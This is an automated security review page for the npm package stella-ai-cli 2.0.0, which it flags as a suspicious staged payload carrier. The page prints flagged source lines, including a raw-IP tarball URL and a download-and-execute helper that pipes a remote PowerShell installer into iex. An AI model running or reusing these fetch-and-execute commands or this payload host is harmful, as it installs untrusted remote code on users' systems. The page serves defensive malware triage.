registry  /  stella-ai-cli  /  2.0.0

stella-ai-cli@2.0.0

Stella AI — умный CLI-ассистент

AI Security Review

scanned 9d ago · by lpm-firewall-ai

The package ships an unwired downloader/executor that fetches an unauthenticated tarball from a raw IP and runs bun install inside the extracted directory. The declared CLI contacts the same HTTP service for registration and chat.

Static reason
High-risk behavior combination matched malicious policy.; source matched previously finalized malicious package; routed for review
Trigger
Manual execution of bin/postinstall.js or install.bat; runtime use of stella CLI for chat/register.
Impact
If the helper is invoked, remote server contents can control code installed/executed under ~/.stella; CLI use discloses user-entered phone, verification code, chat messages, and token to the service.
Mechanism
remote payload download and dependency execution helper, plus hosted chat API client
Attack narrative
npm install does not automatically trigger the dangerous helper because package.json has no lifecycle scripts. However, the package ships bin/postinstall.js and install.bat that, when invoked, fetch remote unauthenticated code/scripts from a raw IP and execute installer/dependency actions locally, making the tarball a staged payload carrier even though the declared stella bin is mainly an interactive hosted chat client.
Rationale
Source inspection does not confirm automatic install-time malware, but it does confirm shipped remote download-and-execute helpers with unauthenticated HTTP payloads and shell execution. Treat as suspicious/staged payload carrier rather than clean because the dangerous code is present and plausibly user-invoked, but not wired as an npm lifecycle hook.
Evidence
package.jsonbin/stella.jsbin/postinstall.jsinstall.batinstall.shinstall.ps1fix-server.jsserver.js~/.stella/config.json~/.stella/stella.tar.gz~/.stella/home/alex/stella/server.js~/.bashrc~/.zshrc
Network endpoints8
62.238.2.22:878762.238.2.22:8787/stella-latest.tar.gz62.238.2.22:8787/install.ps1bun.sh/installdeb.nodesource.com/setup_22.xnodejs.org/dist/v22.14.0/node-v22.14.0-x64.msiopenrouter.ai127.0.0.1:8788

Decision evidence

public snapshot
AI called this Suspicious at 86.0% confidence as Dangerous Capability with medium false-positive risk.
Evidence for warning
  • bin/postinstall.js downloads http://62.238.2.22:8787/stella-latest.tar.gz, extracts it under ~/.stella, then runs bun install there.
  • bin/postinstall.js can install Bun via curl|bash or PowerShell irm|iex before running downloaded code dependencies.
  • install.bat executes remote PowerShell from http://62.238.2.22:8787/install.ps1 with ExecutionPolicy bypass.
  • fix-server.js rewrites absolute /home/alex/stella/server.js if run, showing packaged deployment/helper code with out-of-package writes.
  • bin/stella.js sends phone, WhatsApp code, chat messages, and bearer token to http://62.238.2.22:8787.
Evidence against
  • package.json has no preinstall/install/postinstall lifecycle scripts, so bin/postinstall.js is not automatically run by npm install.
  • Declared npm bin is bin/stella.js, which is an interactive AI chat/register CLI rather than install-time code.
  • No evidence of filesystem harvesting, credential file scanning, persistence, destructive actions, or AI-agent control-surface mutation in the declared bin.
  • Network use in bin/stella.js is mostly aligned with a hosted chat/auth CLI service.
Behavioral surface
Source
ChildProcessEnvironmentVarsFilesystemNetworkShell
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 5 file(s), 21.1 KB of source, external domains: 62.238.2.22, bun.sh

Source & flagged code

7 flagged · loading source
bin/postinstall.jsView file
1#!/usr/bin/env node L2: const { execSync, spawn } = require("child_process"); L3: const path = require("path"); L4: const fs = require("fs"); L5: const https = require("https"); L6: const http = require("http"); ... L8: L9: const STELLA_DIR = path.join(os.homedir(), ".stella"); L10: const RELEASE_URL = "http://62.238.2.22:8787/stella-latest.tar.gz"; ... L17: console.log("→ Installing bun..."); L18: if (process.platform === "win32") { L19: execSync('powershell -c "irm bun.sh/install.ps1 | iex"', { stdio: "inherit" });
Critical
Download Execute

Source downloads or fetches remote code and executes it.

bin/postinstall.jsView on unpkg · L1
1#!/usr/bin/env node L2: const { execSync, spawn } = require("child_process"); L3: const path = require("path");
High
Child Process

Package source references child process execution.

bin/postinstall.jsView on unpkg · L1
18if (process.platform === "win32") { L19: execSync('powershell -c "irm bun.sh/install.ps1 | iex"', { stdio: "inherit" }); L20: } else {
High
Shell

Package source references shell execution.

bin/postinstall.jsView on unpkg · L18
1#!/usr/bin/env node L2: const { execSync, spawn } = require("child_process"); L3: const path = require("path"); L4: const fs = require("fs"); L5: const https = require("https"); L6: const http = require("http"); ... L8: L9: const STELLA_DIR = path.join(os.homedir(), ".stella"); L10: const RELEASE_URL = "http://62.238.2.22:8787/stella-latest.tar.gz"; ... L17: console.log("→ Installing bun..."); L18: if (process.platform === "win32") { L19: execSync('powershell -c "irm bun.sh/install.ps1 | iex"', { stdio: "inherit" });
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

bin/postinstall.jsView on unpkg · L1
matchType = normalized_sha256 matchedPackage = stella-ai-cli@1.0.0 matchedPath = bin/postinstall.js matchedIdentity = npm:c3RlbGxhLWFpLWNsaQ:1.0.0 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

bin/postinstall.jsView on unpkg
install.shView file
path = install.sh kind = build_helper sizeBytes = 1008 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

install.shView on unpkg
package.jsonView file
scripts registry_only=start
Critical
Manifest Confusion

Tarball package.json differs from the npm registry version manifest for scripts or dependency sets.

package.jsonView on unpkg

Findings

2 Critical4 High4 Medium3 Low
CriticalDownload Executebin/postinstall.js
CriticalManifest Confusionpackage.json
HighChild Processbin/postinstall.js
HighShellbin/postinstall.js
HighSandbox Evasion Gated Capabilitybin/postinstall.js
HighKnown Malware Source Similaritybin/postinstall.js
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helperinstall.sh
MediumStructural Risk Force Deep Review
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings